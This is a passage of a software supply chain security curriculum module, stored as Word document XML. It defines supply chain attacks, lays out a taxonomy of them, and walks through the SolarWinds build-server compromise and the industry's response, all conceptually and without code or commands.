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SOFTWARE SUPPLY CHAIN SECURITY</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1: Supply Chain Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="505050"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An in-depth reference explaining what supply chain attacks are, why they have become the dominant concern in modern software security, detailed analyses of five landmark incidents (SolarWinds, Codecov, Log4Shell, event-stream, xz-utils), and the five-level threat model (source, build, dependencies, distribution, runtime) that organizes the rest of this curriculum.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction: A New Curriculum, A New Category of Threat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the first module of a new curriculum — Software Supply Chain Security — that sits alongside the Deployment Strategies and Secrets Management curricula you have previously worked through. The three curricula overlap in some details but address distinct concerns. Deployment Strategies addressed how code reaches production safely, focusing on progressive exposure and rollback. Secrets Management addressed how credentials flow through the system without being leaked. Supply Chain Security addresses a different question: how do you know, with any confidence, that the code you are running is actually the code you intended to run — that it has not been tampered with at any point between when a developer wrote it and when it reaches production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The question sounds abstract but has an unsettling concrete answer for most organizations: you do not know, and neither does anyone else. Modern software is assembled from dozens, hundreds, or thousands of third-party dependencies, each with its own maintainers, its own build systems, its own publication pipelines. Those dependencies in turn depend on other dependencies — transitively, in layers that few people fully inventory, let alone audit. Each layer is a point where something could go wrong: a malicious commit, a compromised maintainer account, a poisoned build server, a registry mirror serving altered content. The entire apparatus has historically rested on trust: you trust that the npm package you installed is actually the package its maintainer intended to publish. You trust that the maintainer's laptop has not been compromised. You trust that the CI system that built the artifact is itself trustworthy. You trust, transitively, the same things about every dependency in your dependency tree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supply chain security is the discipline of converting those trust assumptions into verifiable facts — or, where verification is impossible, of layering defenses so that individual failures do not compromise the whole. This module sets the foundation by explaining the threat model: what supply chain attacks are, what specific incidents have shaped the field's understanding of them, and what the categories of attack look like from source through runtime. The rest of the curriculum covers the defensive tools and practices that address each category.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each curriculum bullet is treated as a full chapter. You will learn: (1) what a supply chain attack is and why it is structurally different from other classes of security failure; (2) five landmark incidents in detail, chosen because each illustrates a distinct attack pattern and each has shaped industry response in specific ways; (3) the argument for why supply chain has become 'the new battleground' and why defending one application at a time no longer suffices; and (4) the five-level threat model — source, build, dependencies, distribution, runtime — that will organize the remaining modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 1: What Is a Supply Chain Attack?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 The Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A supply chain attack </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is an attack in which the adversary compromises a component that other parties trust and consume — a library, a build tool, a compiler, a CI/CD platform, a package registry, an update server — in order to reach those downstream consumers. The attacker does not need to breach the target directly; they compromise something the target depends on, wait for the target to pull in the compromised component through its normal workflow, and thereby gain access to the target without the target having any opportunity to notice a direct attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The word 'supply chain' is borrowed from manufacturing and is apt. A physical manufacturer buys components from suppliers; a supplier compromise (tampered parts, counterfactual certifications) propagates through every product that uses those parts. Software is assembled similarly, but with much higher coupling: a single compromised library may be included in thousands of applications within hours of publication; a single compromised build server may produce tens of thousands of tainted artifacts before anyone notices. The leverage available to a supply chain attacker is orders of magnitude higher than for a direct attacker, which is why supply chain has become the category of choice for sophisticated adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Why Supply Chain Is Structurally Different</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional security focuses on defending specific assets — servers, networks, applications, data. The security team defines a perimeter, enumerates the assets inside, and deploys controls to protect them. This model works reasonably well when the attack surface is bounded and known. Supply chain attacks break the model in specific ways:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The attack surface is unbounded. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Every dependency, every transitive dependency, every tool used to build or publish software, every system those tools run on — all are potential entry points. An organization with 5,000 direct dependencies likely has hundreds of thousands of transitive ones, spread across many maintainers and hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attacks arrive through legitimate channels. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The compromised library is pulled in by the same 'npm install' or 'pip install' the team runs every day. There is no unusual network connection, no suspicious login, no red flag. The attack looks identical to normal operation until the malicious payload executes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trust is transitive. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You trust a library you vendored; that library trusts its own dependencies; those dependencies trust their test frameworks, build tools, and so on. A compromise three levels deep in your dependency tree reaches you with the same effect as a direct compromise of your own codebase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection is delayed. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Many supply chain attacks are discovered months or years after deployment. The compromised code runs, does its job (serving the attacker), and is only caught when an unrelated investigation or a researcher stumbles across an anomaly. The SolarWinds compromise was live for nine months before detection. The xz-utils backdoor was deployed for roughly a month before a researcher noticed a subtle performance anomaly and investigated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The blast radius is extraordinary. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A single successful compromise of a widely-used component reaches every consumer of that component — potentially tens of thousands of organizations from a single attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 The Asymmetry of Attacker vs. Defender</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supply chain attacks exploit a fundamental asymmetry. A defender must consider every component they consume; an attacker only needs to find one that is compromisable. A defender must verify every link in the chain; an attacker only needs to successfully compromise one link. A defender must keep the chain secure indefinitely; an attacker only needs one successful moment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This asymmetry is multiplied by the cascade property of software assembly. A compromise in a build tool propagates to every project that uses the tool. A compromise in a runtime library propagates to every application that loads it. A compromise in a foundational cryptography library propagates to essentially every modern application. The attacker's single act of compromise has a multiplicative payoff that no defender's single act of protection can match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is why the defensive posture must be architectural rather than reactive. It is not enough to respond to known compromises; the goal is to make it structurally difficult for an attacker to succeed in the first place, and to bound the damage when they do succeed. The tools covered in later modules of this curriculum — SLSA, SBOM, signing, provenance, attestation, reproducible builds — are all attempts to change the underlying architecture of software distribution so that compromises are harder to hide and easier to contain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Categories of Supply Chain Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supply chain attacks come in several forms, each with distinct characteristics. A rough taxonomy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious-dependency injection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a legitimate package is replaced with a malicious version (via maintainer compromise, via typosquatting a similar name, via taking over an abandoned package). The package's consumers install the malicious version through their normal workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Build-system compromise: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the system that builds legitimate software is compromised. Legitimate source code enters the build, malicious binary comes out. The source repository looks clean; only the build output is tainted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution compromise: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the legitimate artifact exists, but the distribution channel delivers something different to the consumer. Compromised mirrors, MITM attacks on unencrypted downloads, DNS hijacking of package registries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source-code compromise: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">malicious code is introduced at the source level — either by a compromised contributor, a social-engineering attack on a maintainer, or a malicious pull request that escapes review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Update-delivery attack: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the software's own update mechanism is hijacked. Users are delivered a malicious 'update' that installs as if it were legitimate. The SolarWinds incident is the canonical example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime / consumption attack: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">even where the software was delivered correctly, consumption of known-vulnerable components by production systems gives attackers a direct path. Log4Shell is this category — Log4j was not tampered with, it was just vulnerable, and almost everyone was using it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The incidents covered in the next chapters illustrate each of these categories. They are chosen not just for their historical importance but because each demonstrated an attack pattern that changed how the industry thinks about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A supply chain attack compromises a component that downstream consumers trust, propagating the compromise to every consumer at scale. It exploits structural properties of modern software — unbounded dependency surfaces, transitive trust, delayed detection, and extraordinary blast radius — that traditional perimeter-based security was not designed to handle. The asymmetry favors attackers: a defender must secure every link; an attacker only needs to find one weak link. The defensive response must therefore be architectural (make compromises structurally harder and more contained) rather than reactive (respond to known incidents).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 2: SolarWinds (2020) — The Inflection Point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 What Happened</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In December 2020, the cybersecurity firm FireEye (now part of Google Cloud) disclosed that it had been breached, and that during the investigation it had discovered a far broader intrusion: the attackers had compromised SolarWinds, an enterprise IT-management software vendor, and had used that compromise to distribute malicious updates to SolarWinds's customers. The malicious updates had been live for approximately nine months before detection, and had been installed by an estimated 18,000 organizations — including most of the US federal civilian executive branch, major corporations, and critical infrastructure operators. Of those 18,000, a smaller number (around 100) were selected for deeper exploitation by the attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The incident is widely regarded as the inflection point for supply chain security as a named discipline. Before SolarWinds, supply chain attacks were understood as a theoretical concern discussed mostly among security researchers. After SolarWinds, supply chain security became a direct concern of national security agencies, regulators, and executive-level decision-makers at every large enterprise. The US federal government issued Executive Order 14028 ("Improving the Nation's Cybersecurity") in May 2021 partly in response to this incident; much of the subsequent policy work on SBOM, SLSA, and signing traces directly to this document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 The Attack Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What made SolarWinds distinctive was not the endpoint effect — backdoored software installed at thousands of customer sites is, in itself, a familiar pattern. What made it distinctive was where in the chain the compromise happened. The attackers did not modify the SolarWinds source code repository (which would have been caught by developers who worked with the source). They did not compromise the release signing keys (which would have been caught by release engineers). They compromised the build server itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The specific mechanism, reconstructed from the multiple investigations that followed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers gained access to SolarWinds's internal build environment, likely through a combination of phishing and exploitation of existing vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">They deployed a tool (later called SUNSPOT) that monitored the build server for Orion product builds in progress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When a build began, SUNSPOT would surgically replace a specific source file with a tampered version that included a backdoor, wait for the compiler to read it, and then restore the original file — all before any other part of the system could observe the tampered version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The resulting build output was a legitimately-compiled, legitimately-signed Orion binary — with a backdoor (SUNBURST) embedded in it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The tainted binary was released through the normal update channel to SolarWinds customers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Customers installed the 'update' through the normal procedure; the backdoor became active in their environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because the compromise happened at build time, the source code repository looked clean. Any audit of the source, any developer review, any static analysis of the code as written would have found nothing — the backdoor was literally not in the code. It was injected into the compilation unit at the instant of compilation and disappeared immediately afterward.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 What the Attackers Did With Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SUNBURST backdoor, once installed in a victim environment, did not immediately act. It waited for two weeks of dormancy (to evade early detection), then began phoning home to command-and-control servers with information about the victim's environment. From thousands of infected organizations, the attackers selected approximately 100 for deeper exploitation — each of them an organization with data or access the attackers valued.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The deeper exploitation included:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credential theft and privilege escalation within victim networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compromise of identity infrastructure (SAML identity providers in particular), enabling the attackers to mint arbitrary authentication tokens for victim environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persistent access across infrastructure boundaries, including to cloud environments where SAML tokens authorized access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exfiltration of specific data — emails, documents, source code — from targeted organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers were eventually attributed by US intelligence agencies to APT29 / Cozy Bear, a Russian foreign-intelligence-service-associated threat group. The attribution matters less for this curriculum than the technical pattern: a state-level adversary willing to invest substantial resources in a years-long operation found supply chain compromise to be the highest-leverage attack vector available to them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 What the Incident Demonstrated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SolarWinds demonstrated, concretely and at scale, several points that had previously been theoretical:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Build-system compromise is a real attack vector. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Source-level defenses (code review, signing, audits) do not protect against an attacker who can modify code in flight during compilation. The build server is itself a target worthy of protection equivalent to production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trust in vendor-signed artifacts is not sufficient. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SolarWinds's updates were signed with a legitimate SolarWinds signing key. Every customer validated the signature; every signature validated correctly. The signature proved the artifact came from SolarWinds — it did not prove the artifact represented SolarWinds's intent. The distinction matters: signing certifies origin, not correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The blast radius of a single compromise is extraordinary. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">One build server, compromised by one set of attackers, reached 18,000 organizations — including the most sensitive infrastructure in multiple countries. No direct attack could have achieved similar reach. Supply chain attacks are force multipliers of exceptional magnitude.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection is hard and delayed. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nine months of live malicious updates, undetected. The eventual detection came not from SolarWinds nor from any of the 18,000 victims observing the backdoor's operation; it came from FireEye investigating an unrelated anomaly in their own environment and working backward to the source. Without that lucky discovery, the compromise would likely have persisted much longer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 The Response That Shaped the Field</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SolarWinds catalyzed the modern supply chain security agenda. Specific concrete outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executive Order 14028 (May 2021), requiring federal software vendors to provide SBOMs and to meet specific supply chain security standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The OpenSSF (Open Source Security Foundation), a cross-industry group formed in part to address the systemic issues this incident revealed, accelerated work on SLSA, Sigstore, and related tooling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SLSA (Supply-chain Levels for Software Artifacts), the framework covered in later modules of this curriculum, was substantially motivated by the specific attack pattern (build-server compromise) SolarWinds demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
